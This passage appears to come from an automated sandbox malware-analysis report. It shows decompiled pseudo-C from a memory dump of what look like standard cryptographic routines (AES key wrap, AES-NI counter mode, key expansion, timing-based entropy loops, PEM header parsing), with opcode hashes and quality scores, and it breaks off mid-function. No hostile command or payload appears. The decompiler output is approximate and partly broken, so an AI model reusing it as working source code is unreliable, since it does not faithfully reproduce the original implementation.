                                                              				_t51 =  *0xcc5970; // 0x851ab4dd
                                                              				_a36 = _t51 ^ _t102;
                                                              				_a12 = _a48;
                                                              				_t101 = _a44;
                                                              				_t55 = _a56 - 8;
                                                              				_t98 = _a52;
                                                              				_a16 = __edx;
                                                              				_v0 = _t55;
                                                              				if((_t55 & 0x00000007) != 0) {
                                                              					L11:
                                                              					return E00C69C26(0, _t66, _a36 ^ _t102, _t84, _t93, _t98);
                                                              				} else {
                                                              					_t84 = _t55 - 0x10;
                                                              					if(_t55 - 0x10 > 0x7ffffff0) {
                                                              						goto L11;
                                                              					} else {
                                                              						_push(__ebx);
                                                              						_push(__edi);
                                                              						_a20 =  *__ecx;
                                                              						_t70 = (_t55 >> 3) + (_t55 >> 3) * 2 + (_t55 >> 3) + (_t55 >> 3) * 2;
                                                              						_a24 =  *((intOrPtr*)(__ecx + 4));
                                                              						E00C6BBC0(_t70, __edi, _t98, _t98, __ecx + 8, _t55);
                                                              						_t59 = _v0;
                                                              						_t104 = _t102 + 0xc;
                                                              						_a8 = _t59 + _t98 - 8;
                                                              						_a4 = 6;
                                                              						do {
                                                              							_t99 = _a8;
                                                              							if(_t59 > 0) {
                                                              								_t96 = (_t59 - 1 >> 3) + 1;
                                                              								do {
                                                              									_a27 = _a27 ^ _t70;
                                                              									if(_t70 > 0xff) {
                                                              										_a26 = _a26 ^ _t70 >> 0x00000008;
                                                              										_a25 = _a25 ^ _t70 >> 0x00000010;
                                                              										_a24 = _a24 ^ _t70 >> 0x00000018;
                                                              									}
                                                              									_t77 =  &_a20;
                                                              									_a28 =  *_t99;
                                                              									_a32 =  *((intOrPtr*)(_t99 + 4));
                                                              									_a16(_t77, _t77, _t101);
                                                              									 *_t99 = _a28;
                                                              									 *((intOrPtr*)(_t99 + 4)) = _a32;
                                                              									_t104 = _t104 + 0xc;
                                                              									_t70 = _t70 - 1;
                                                              									_t99 = _t99 - 8;
                                                              									_t96 = _t96 - 1;
                                                              								} while (_t96 != 0);
                                                              								_t59 = _v0;
                                                              							}
                                                              							_t41 =  &_a4;
                                                              							 *_t41 = _a4 - 1;
                                                              						} while ( *_t41 != 0);
                                                              						_t81 = _a12;
                                                              						_pop(_t97);
                                                              						_pop(_t71);
                                                              						 *_t81 = _a20;
                                                              						 *((intOrPtr*)(_t81 + 4)) = _a24;
                                                              						return E00C69C26(_t59, _t71, _a36 ^ _t104, _a24, _t97, _t99);
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eea724a56ad65be1b6ae2f72a3b0d31ca73629a16ad078eb2596b2bf2c1ef7ca
                                                              • Instruction ID: 66f07d2e5a58aedba68a5329f7bb3953af6168b0244437a4d4297aa2af6175bb
                                                              • Opcode Fuzzy Hash: eea724a56ad65be1b6ae2f72a3b0d31ca73629a16ad078eb2596b2bf2c1ef7ca
                                                              • Instruction Fuzzy Hash: 63311271A193019FC304DF69C980A6BFBE4EFC9314F908A6EF49997211D770E909CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E00BA4080(intOrPtr __ebx, intOrPtr __esi, void* __ebp, intOrPtr _a4, intOrPtr* _a8, char _a12, signed int _a16, signed int _a17, signed int _a18, signed int _a19, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44, intOrPtr _a48, signed char _a52, intOrPtr _a56) {
                                                              				char _v0;
                                                              				void* __edi;
                                                              				signed int _t48;
                                                              				signed char _t51;
                                                              				intOrPtr* _t55;
                                                              				signed char _t56;
                                                              				unsigned int _t65;
                                                              				intOrPtr _t66;
                                                              				intOrPtr _t67;
                                                              				char* _t81;
                                                              				intOrPtr* _t86;
                                                              				void* _t89;
                                                              				intOrPtr* _t91;
                                                              				intOrPtr _t92;
                                                              				intOrPtr _t94;
                                                              				signed int _t95;
                                                              				signed int _t97;
                                                              
                                                              				_t90 = __esi;
                                                              				_t64 = __ebx;
                                                              				E00C6BB10(0x20);
                                                              				_t48 =  *0xcc5970; // 0x851ab4dd
                                                              				_a28 = _t48 ^ _t95;
                                                              				_t67 = _a48;
                                                              				_t94 = _a36;
                                                              				_a4 = _a56;
                                                              				_t51 = _a52;
                                                              				_t86 = _a44;
                                                              				_a8 = _t86;
                                                              				if((_t51 & 0x00000007) != 0) {
                                                              					L13:
                                                              					return E00C69C26(0, _t64, _a28 ^ _t95, _t78, _t86, _t90);
                                                              				} else {
                                                              					_t78 = _t51 - 0x10;
                                                              					if(_t51 - 0x10 > 0x7ffffff0) {
                                                              						goto L13;
                                                              					} else {
                                                              						_push(__ebx);
                                                              						_push(__esi);
                                                              						_t65 = 1;
                                                              						E00C6BBC0(1, _t86, __esi, _t86 + 8, _t67, _t51);
                                                              						_t55 = _a40;
                                                              						_t97 = _t95 + 0xc;
                                                              						if(_t55 == 0) {
                                                              							_t55 = 0xc81934;
                                                              						}
                                                              						_t14 = _t55 + 4; // 0xa6a6a6a6
                                                              						_a12 =  *_t55;
                                                              						_a16 =  *_t14;
                                                              						_v0 = 6;
                                                              						do {
                                                              							_t56 = _a52;
                                                              							_t91 = _t86 + 8;
                                                              							if(_t56 > 0) {
                                                              								_t89 = (_t56 - 1 >> 3) + 1;
                                                              								do {
                                                              									_t81 =  &_a12;
                                                              									_a20 =  *_t91;
                                                              									_a24 =  *((intOrPtr*)(_t91 + 4));
                                                              									_a4(_t81, _t81, _t94);
                                                              									_a19 = _a19 ^ _t65;
                                                              									_t97 = _t97 + 0xc;
                                                              									if(_t65 > 0xff) {
                                                              										_a18 = _a18 ^ _t65 >> 0x00000008;
                                                              										_a17 = _a17 ^ _t65 >> 0x00000010;
                                                              										_a16 = _a16 ^ _t65 >> 0x00000018;
                                                              									}
                                                              									 *_t91 = _a20;
                                                              									 *((intOrPtr*)(_t91 + 4)) = _a24;
                                                              									_t65 = _t65 + 1;
                                                              									_t91 = _t91 + 8;
                                                              									_t89 = _t89 - 1;
                                                              								} while (_t89 != 0);
                                                              								_t56 = _a52;
                                                              								_t86 = _a8;
                                                              							}
                                                              							_t39 =  &_v0;
                                                              							 *_t39 = _v0 - 1;
                                                              						} while ( *_t39 != 0);
                                                              						_pop(_t92);
                                                              						_pop(_t66);
                                                              						 *_t86 = _a12;
                                                              						 *((intOrPtr*)(_t86 + 4)) = _a16;
                                                              						return E00C69C26(_t56 + 8, _t66, _a28 ^ _t97, _a16, _t86, _t92);
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f81930e91149e6f63516e190ec2ed1ccb1189bad93cce3e385b74c91e0a232c
                                                              • Instruction ID: d6418c67f2d93b704a0a65130ee17ecdba6479c1397ac2b84c295e8d5c29b800
                                                              • Opcode Fuzzy Hash: 9f81930e91149e6f63516e190ec2ed1ccb1189bad93cce3e385b74c91e0a232c
                                                              • Instruction Fuzzy Hash: CB3120716083419FC314CF29C981A6AFBE5EFC9318F848A2DF89997341D771E949CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E00B9E1E0(void* __ebp, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48) {
                                                              				signed int _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t45;
                                                              				signed int _t48;
                                                              				signed int _t54;
                                                              				intOrPtr _t59;
                                                              				signed int _t61;
                                                              				intOrPtr _t69;
                                                              				signed int _t75;
                                                              				signed int _t85;
                                                              				intOrPtr* _t86;
                                                              				signed int _t90;
                                                              				signed int _t91;
                                                              
                                                              				E00C6BB10(0x24);
                                                              				_t45 =  *0xcc5970; // 0x851ab4dd
                                                              				_a32 = _t45 ^ _t90;
                                                              				_t59 = _a44;
                                                              				_t86 = _a40;
                                                              				_t48 =  *(_t86 + 0x98) ^  *(_t86 + 0x88);
                                                              				_t61 =  *(_t86 + 0x9c) ^  *(_t86 + 0x8c);
                                                              				_t75 =  *(_t86 + 0xa0) ^  *(_t86 + 0x90);
                                                              				_v0 = _t48;
                                                              				_t85 =  *(_t86 + 0xa4) ^  *(_t86 + 0x94);
                                                              				_a4 = _t61;
                                                              				_a8 = _t75;
                                                              				_a20 =  *(_t86 + 0x34) ^ _t61;
                                                              				_a24 =  *(_t86 + 0x38) ^ _t75;
                                                              				_a28 =  *(_t86 + 0x3c) ^ _t85;
                                                              				_a12 = _t85;
                                                              				_a16 =  *(_t86 + 0x30) ^ _t48;
                                                              				 *((intOrPtr*)( *_t86))( &_a16,  &_v0,  *((intOrPtr*)(_t86 + 8)));
                                                              				_t31 = _t86 + 0x58; // 0x250
                                                              				_t54 = _t31;
                                                              				 *_t54 =  *(_t86 + 0x78) ^ _v0;
                                                              				 *(_t54 + 4) =  *(_t86 + 0x7c) ^ _a4;
                                                              				 *(_t86 + 0x60) =  *(_t86 + 0x80) ^ _a8;
                                                              				_t69 = _a48;
                                                              				 *(_t86 + 0x64) =  *(_t86 + 0x84) ^ _a12;
                                                              				_t83 = _t69 - 1;
                                                              				_t91 = _t90 + 0xc;
                                                              				if(_t69 - 1 > 0xf || _t59 == 0) {
                                                              					return E00C69C26(_t54 | 0xffffffff, _t59, _a32 ^ _t91, _t83, _t85, _t86);
                                                              				} else {
                                                              					return E00C69C26(E00BA3A50(_t54, _t59, _t69), _t59, _a32 ^ _t91 + 0x0000000c, _t83, _t85, _t86);
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 743d5ecbe701c145b6104afbb7c157e4a7f19d1701aaf7830fb5b311badf5c79
                                                              • Instruction ID: c0eda6b18ee838bd8ad823542b88340d4333c1f9401a463ed64ce22926158261
                                                              • Opcode Fuzzy Hash: 743d5ecbe701c145b6104afbb7c157e4a7f19d1701aaf7830fb5b311badf5c79
                                                              • Instruction Fuzzy Hash: 223114B5608B009FD318CF2AC581A6BF7E5FFCC314F818A2EE59A87650D630B945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 21%
                                                              			E00B99030(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
                                                              				intOrPtr _v28;
                                                              				void* _v36;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v52;
                                                              				intOrPtr _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v72;
                                                              				intOrPtr _t22;
                                                              				void* _t26;
                                                              				void* _t30;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t39;
                                                              
                                                              				_t35 = _a4;
                                                              				_t33 = _a8;
                                                              				_t22 = _a12;
                                                              				_v28 = _t39;
                                                              				asm("movdqu xmm7, [ebx]");
                                                              				asm("movdqu xmm3, [ecx]");
                                                              				 *(_t39 - 0x0000003c & 0xfffffff0) = 0xc0d0e0f;
                                                              				_v72 = 0x8090a0b;
                                                              				_v68 = 0x4050607;
                                                              				_v64 = 0x10203;
                                                              				_v60 = 1;
                                                              				_v56 = 0;
                                                              				_v52 = 0;
                                                              				_v48 = 0;
                                                              				asm("movdqa xmm5, [esp]");
                                                              				asm("movdqa xmm2, xmm7");
                                                              				_t26 = 0x10 - ( *(_a16 + 0xf0) << 4);
                                                              				asm("pshufb xmm7, xmm5");
                                                              				do {
                                                              					asm("movups xmm0, [ebp]");
                                                              					_t30 = _t26;
                                                              					asm("movups xmm6, [esi]");
                                                              					asm("xorps xmm2, xmm0");
                                                              					asm("movups xmm1, [ebp+0x10]");
                                                              					asm("xorps xmm0, xmm6");
                                                              					asm("xorps xmm3, xmm0");
                                                              					asm("movups xmm0, [ebp+0x20]");
                                                              					do {
                                                              						asm("aesenc xmm2, xmm1");
                                                              						asm("aesenc xmm3, xmm1");
                                                              						asm("movups xmm1, [edx+ecx]");
                                                              						_t30 = _t30 + 0x20;
                                                              						asm("aesenc xmm2, xmm0");
                                                              						asm("aesenc xmm3, xmm0");
                                                              						asm("movups xmm0, [edx+ecx-0x10]");
                                                              					} while (_t30 != 0);
                                                              					asm("aesenc xmm2, xmm1");
                                                              					asm("aesenc xmm3, xmm1");
                                                              					asm("paddq xmm7, [esp+0x10]");
                                                              					_t22 = _t22 - 1;
                                                              					asm("aesenclast xmm2, xmm0");
                                                              					asm("aesenclast xmm3, xmm0");
                                                              					_t35 = _t35 + 0x10;
                                                              					asm("xorps xmm6, xmm2");
                                                              					asm("movdqa xmm2, xmm7");
                                                              					asm("movups [edi], xmm6");
                                                              					asm("pshufb xmm2, xmm5");
                                                              					_t33 = _t33 + 0x10;
                                                              				} while (_t22 != 0);
                                                              				asm("movups [edi], xmm3");
                                                              				asm("pxor xmm0, xmm0");
                                                              				asm("pxor xmm1, xmm1");
                                                              				asm("pxor xmm2, xmm2");
                                                              				asm("pxor xmm3, xmm3");
                                                              				asm("pxor xmm4, xmm4");
                                                              				asm("pxor xmm5, xmm5");
                                                              				asm("pxor xmm6, xmm6");
                                                              				asm("pxor xmm7, xmm7");
                                                              				return _t22;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
                                                              • Instruction ID: 11a11b0b8a9d6b73d8de5a07021b4acfaf8f50bb3cad6f4e11f6a9709c1b5ad6
                                                              • Opcode Fuzzy Hash: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
                                                              • Instruction Fuzzy Hash: 7E316C3480CB9A97D7029F39C441566F7A0BFAA258F00CB1EED9433661D771BA84AA52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E00BA2100(signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                              				void* _t3;
                                                              				void* _t4;
                                                              				void* _t6;
                                                              				void* _t7;
                                                              				void* _t8;
                                                              				void* _t10;
                                                              				void* _t11;
                                                              				void* _t13;
                                                              				void* _t14;
                                                              				void* _t18;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              				void* _t26;
                                                              				void* _t28;
                                                              				void* _t34;
                                                              
                                                              				_t28 = __edi;
                                                              				_t26 = __edx;
                                                              				_t25 = __ecx;
                                                              				asm("movdqu xmm0, [esi]");
                                                              				asm("movdqa xmm2, [ebp+0x140]");
                                                              				asm("movdqa xmm3, xmm0");
                                                              				asm("movdqa [esp+0x4], xmm2");
                                                              				_t4 = E00BA2370(_t3);
                                                              				asm("movdqa xmm7, xmm0");
                                                              				if(__edi != 0) {
                                                              					asm("movdqa xmm1, [ebp+ecx+0x100]");
                                                              					asm("pshufb xmm3, xmm1");
                                                              					asm("movdqu [edx], xmm3");
                                                              					_t25 = __ecx ^ 0x00000030;
                                                              				} else {
                                                              					asm("movdqu [edx], xmm0");
                                                              				}
                                                              				_t34 = _t4 - 0xc0;
                                                              				if(_t34 > 0) {
                                                              					asm("movdqu xmm0, [esi+0x10]");
                                                              					E00BA2370(_t4);
                                                              					_t6 = 7;
                                                              					while(1) {
                                                              						_t7 = E00BA23A0(_t6, _t25, _t26, _t28);
                                                              						asm("movdqa xmm6, xmm0");
                                                              						_t8 = E00BA22A0(_t7);
                                                              						_t9 = _t8 == 1;
                                                              						if(_t8 == 1) {
                                                              							goto L14;
                                                              						}
                                                              						_t11 = E00BA23A0(_t9, _t25, _t26, _t28);
                                                              						asm("pshufd xmm0, xmm0, 0xff");
                                                              						asm("movdqa [esp+0x14], xmm7");
                                                              						asm("movdqa xmm7, xmm6");
                                                              						_t6 = E00BA22CB(_t11);
                                                              						asm("movdqa xmm7, [esp+0x14]");
                                                              					}
                                                              				} else {
                                                              					if(_t34 == 0) {
                                                              						asm("movdqu xmm0, [esi+0x8]");
                                                              						E00BA2370(_t4);
                                                              						asm("movdqa xmm6, xmm0");
                                                              						asm("pxor xmm4, xmm4");
                                                              						asm("movhlps xmm6, xmm4");
                                                              						_t13 = 4;
                                                              						while(1) {
                                                              							_t14 = E00BA22A0(_t13);
                                                              							asm("palignr xmm0, xmm6, 0x8");
                                                              							_t18 = E00BA22A0(E00BA23A0(E00BA2280(E00BA23A0(_t14, _t25, _t26, _t28)), _t25, _t26, _t28));
                                                              							_t9 = _t18 == 1;
                                                              							if(_t18 == 1) {
                                                              								goto L14;
                                                              							}
                                                              							_t13 = E00BA2280(E00BA23A0(_t9, _t25, _t26, _t28));
                                                              						}
                                                              					} else {
                                                              						_t20 = 0xa;
                                                              						while(1) {
                                                              							_t21 = E00BA22A0(_t20);
                                                              							_t9 = _t21 == 1;
                                                              							if(_t21 == 1) {
                                                              								goto L14;
                                                              							}
                                                              							_t20 = E00BA23A0(_t9, _t25, _t26, _t28);
                                                              						}
                                                              					}
                                                              				}
                                                              				L14:
                                                              				if(_t28 == 0) {
                                                              					asm("movdqa xmm1, [ebp+ecx+0x100]");
                                                              					asm("pshufb xmm0, xmm1");
                                                              					_t26 = _t26 + 0x20;
                                                              				}
                                                              				asm("pxor xmm0, [ebp+0x150]");
                                                              				_t10 = E00BA2370(_t9);
                                                              				asm("movdqu [edx], xmm0");
                                                              				asm("pxor xmm0, xmm0");
                                                              				asm("pxor xmm1, xmm1");
                                                              				asm("pxor xmm2, xmm2");
                                                              				asm("pxor xmm3, xmm3");
                                                              				asm("pxor xmm4, xmm4");
                                                              				asm("pxor xmm5, xmm5");
                                                              				asm("pxor xmm6, xmm6");
                                                              				asm("pxor xmm7, xmm7");
                                                              				return _t10;
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1bd6ee22b8be88284ea3de3379d93d189bee9a2acde73ad58f94725c0800f69d
                                                              • Instruction ID: b28751517a9b203404f6808d220ff6156eb80ed8b5f3d0adcd71a78ba307e089
                                                              • Opcode Fuzzy Hash: 1bd6ee22b8be88284ea3de3379d93d189bee9a2acde73ad58f94725c0800f69d
                                                              • Instruction Fuzzy Hash: 38216F24C0CF4985EB136B7C98433AAA3E0AFE7340F50D396F9D439D52EB2547846215
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 32%
                                                              			E00B9CA70() {
                                                              				signed char* _t28;
                                                              				signed char _t36;
                                                              				unsigned int _t41;
                                                              				void* _t45;
                                                              				signed int* _t46;
                                                              				signed char* _t48;
                                                              				void* _t49;
                                                              				signed int* _t50;
                                                              				void* _t52;
                                                              				void* _t53;
                                                              
                                                              				_t36 =  *(_t52 + 0x10);
                                                              				_t48 =  *(_t52 + 0xc);
                                                              				_t3 =  &(_t48[0x28]); // 0x50560000
                                                              				_t28 =  *_t3;
                                                              				 *(_t52 + 0xc) = _t28;
                                                              				if(_t36 != 0) {
                                                              					_t5 =  &(_t48[0x2c]); // 0x8edae8
                                                              					 *_t48 =  *_t48 | 0x00000040;
                                                              					_t6 =  &(_t48[0x10]); // 0xb940e5
                                                              					_t46 = _t6;
                                                              					 *_t28(_t48, _t46,  *_t5, _t45, _t49);
                                                              					_t53 = _t52 + 0xc;
                                                              					_t48[0x20] = _t48[0x20] + 1;
                                                              					_t41 = _t36;
                                                              					asm("adc dword [esi+0x24], 0x0");
                                                              					if(_t36 >= 0xff00) {
                                                              						_t48[0x11] = _t48[0x11] ^ 0x000000fe;
                                                              						 *_t46 =  !( *_t46);
                                                              						_t48[0x14] = _t48[0x14] ^ _t36 >> 0x00000008;
                                                              						_t48[0x12] = _t48[0x12] ^ _t36 >> 0x00000018;
                                                              						_t48[0x13] = _t48[0x13] ^ _t41 >> 0x00000010;
                                                              						_t48[0x15] = _t48[0x15] ^ _t36;
                                                              						_t34 = 6;
                                                              					} else {
                                                              						 *_t46 =  *_t46 ^ _t41 >> 0x00000008;
                                                              						_t48[0x11] = _t48[0x11] ^ _t36;
                                                              						_t34 = 2;
                                                              					}
                                                              					_t50 =  *(_t53 + 0x18);
                                                              					do {
                                                              						if(_t34 >= 0x10) {
                                                              							goto L8;
                                                              						}
                                                              						while(_t36 != 0) {
                                                              							 *(_t46 + _t34) =  *(_t46 + _t34) ^  *_t50;
                                                              							_t34 = _t34 + 1;
                                                              							_t50 =  &(_t50[0]);
                                                              							_t36 = _t36 - 1;
                                                              							if(_t34 < 0x10) {
                                                              								continue;
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						L8:
                                                              						_t24 =  &(_t48[0x2c]); // 0x8edae8
                                                              						 *((intOrPtr*)(_t53 + 0x20))(_t46, _t46,  *_t24);
                                                              						_t53 = _t53 + 0xc;
                                                              						_t48[0x20] = _t48[0x20] + 1;
                                                              						_t34 = 0;
                                                              						asm("adc [esi+0x24], eax");
                                                              					} while (_t36 != 0);
                                                              					return 0;
                                                              				}
                                                              				return _t28;
                                                              			}














                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aec08d149ecfa6be2b40e01b4dc94bad01a90ea383ffb5275a71a76fa15f278e
                                                              • Instruction ID: 16e79e3586fdd6d70b80266423128bf68febed68c59d35d97b4c15bdbb0ff293
                                                              • Opcode Fuzzy Hash: aec08d149ecfa6be2b40e01b4dc94bad01a90ea383ffb5275a71a76fa15f278e
                                                              • Instruction Fuzzy Hash: D121CF221097C14BD731CE29C88466BBFE1EB86324F144AADD8C687A43D724AA0DC752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%


                                                              C-Code - Quality: 65%
                                                              			E00BA3B00(void* __eflags) {
                                                              				void* _t10;
                                                              				void* _t14;
                                                              				intOrPtr _t15;
                                                              				void* _t18;
                                                              				intOrPtr _t21;
                                                              				void* _t23;
                                                              				intOrPtr _t24;
                                                              				void* _t25;
                                                              				void* _t28;
                                                              
                                                              				asm("bt dword [edx], 0x4");
                                                              				if(__eflags < 0) {
                                                              					asm("bt dword [edx], 0x13");
                                                              					if(__eflags < 0) {
                                                              						_t21 =  *((intOrPtr*)(_t25 + 0x14));
                                                              						_t15 =  *((intOrPtr*)(_t25 + 0x18));
                                                              						_t24 =  *((intOrPtr*)(_t25 + 0x1c));
                                                              						asm("rdtsc");
                                                              						asm("clflush [edi]");
                                                              						asm("lock add [edi], ebx");
                                                              						asm("rdtsc");
                                                              						_t10 = 0;
                                                              						_t23 = 0;
                                                              						_t14 = 0;
                                                              						while(1) {
                                                              							asm("clflush [edi]");
                                                              							asm("lock add [edi], eax");
                                                              							_t24 = _t24 - 1;
                                                              							if(_t24 == 0) {
                                                              								break;
                                                              							}
                                                              							asm("rdtsc");
                                                              							_t18 = _t10;
                                                              							_t10 = _t10 - _t23;
                                                              							_t23 = _t18;
                                                              							_t28 = _t10 - _t14;
                                                              							_t14 = _t10;
                                                              							_t15 = _t15;
                                                              							_t21 = _t21 + (0 | _t28 != 0x00000000) * 4;
                                                              							if(_t15 != 0) {
                                                              								continue;
                                                              							}
                                                              							break;
                                                              						}
                                                              						return  *((intOrPtr*)(_t25 + 0x18)) - _t15;
                                                              					}
                                                              				}
                                                              				return 0;
                                                              			}













                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E00BA3A90(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                              				void* _t5;
                                                              				intOrPtr _t9;
                                                              				void* _t11;
                                                              				intOrPtr _t12;
                                                              				void* _t13;
                                                              
                                                              				_t5 = 0;
                                                              				asm("bt dword [edx], 0x4");
                                                              				if(__eflags < 0) {
                                                              					asm("bt dword [edx], 0x13");
                                                              					if(__eflags < 0) {
                                                              						_t12 = _a4;
                                                              						_t9 = _a8;
                                                              						asm("rdtsc");
                                                              						_t13 = 0;
                                                              						asm("clflush [edi]");
                                                              						asm("lock add [edi], ebx");
                                                              						do {
                                                              							asm("rdtsc");
                                                              							_t11 = _t5;
                                                              							_t5 = _t5 - _t13;
                                                              							_t13 = _t11;
                                                              							asm("clflush [edi]");
                                                              							asm("lock add [edi], eax");
                                                              							_t12 = _t12 + 4;
                                                              							_t9 = _t9 - 1;
                                                              						} while (_t9 != 0);
                                                              						return _a8;
                                                              					}
                                                              				}
                                                              				return _t5;
                                                              			}









                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E00BA3880(void* __edx, void* __eflags) {
                                                              				signed int _t2;
                                                              				void* _t4;
                                                              				intOrPtr* _t9;
                                                              				signed int _t12;
                                                              
                                                              				asm("bt dword [ecx], 0x4");
                                                              				if(__eflags >= 0) {
                                                              					L4:
                                                              					__eflags = 0;
                                                              					return 0;
                                                              				} else {
                                                              					_t2 = cs;
                                                              					_t12 = _t2 & 0x00000003;
                                                              					if(_t12 != 0) {
                                                              						goto L4;
                                                              					} else {
                                                              						asm("pushfd");
                                                              						_pop(_t4);
                                                              						asm("bt eax, 0x9");
                                                              						if(_t12 >= 0) {
                                                              							goto L4;
                                                              						} else {
                                                              							asm("rdtsc");
                                                              							_push(_t4);
                                                              							asm("hlt");
                                                              							asm("rdtsc");
                                                              							asm("sbb edx, [esp+0x4]");
                                                              							return _t4 -  *_t9;
                                                              						}
                                                              					}
                                                              				}
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 97%
                                                              			E00BABE70(void* __ebx, void* __ecx, void* __edi, char _a4, intOrPtr* _a8) {
                                                              				intOrPtr _t9;
                                                              				void* _t10;
                                                              				char* _t15;
                                                              				char* _t18;
                                                              				void* _t19;
                                                              				char* _t20;
                                                              				void* _t22;
                                                              				char* _t25;
                                                              				void* _t26;
                                                              				signed int _t27;
                                                              				intOrPtr _t50;
                                                              				char* _t55;
                                                              				intOrPtr* _t60;
                                                              				void* _t61;
                                                              				intOrPtr* _t62;
                                                              				intOrPtr* _t63;
                                                              				void* _t64;
                                                              				void* _t65;
                                                              				void* _t66;
                                                              				void* _t68;
                                                              				void* _t69;
                                                              				void* _t70;
                                                              				char* _t71;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t73;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              				void* _t78;
                                                              
                                                              				_t53 = __edi;
                                                              				_t73 = _a8;
                                                              				_t60 = _a4;
                                                              				 *_t73 = 0;
                                                              				if(_t60 == 0) {
                                                              					L25:
                                                              					return 1;
                                                              				} else {
                                                              					_t9 =  *_t60;
                                                              					if(_t9 == 0 || _t9 == 0xa) {
                                                              						goto L25;
                                                              					} else {
                                                              						_t10 = E00C6B55B(__ecx, _t60, "Proc-Type:", 0xa);
                                                              						_t76 = _t75 + 0xc;
                                                              						if(_t10 == 0) {
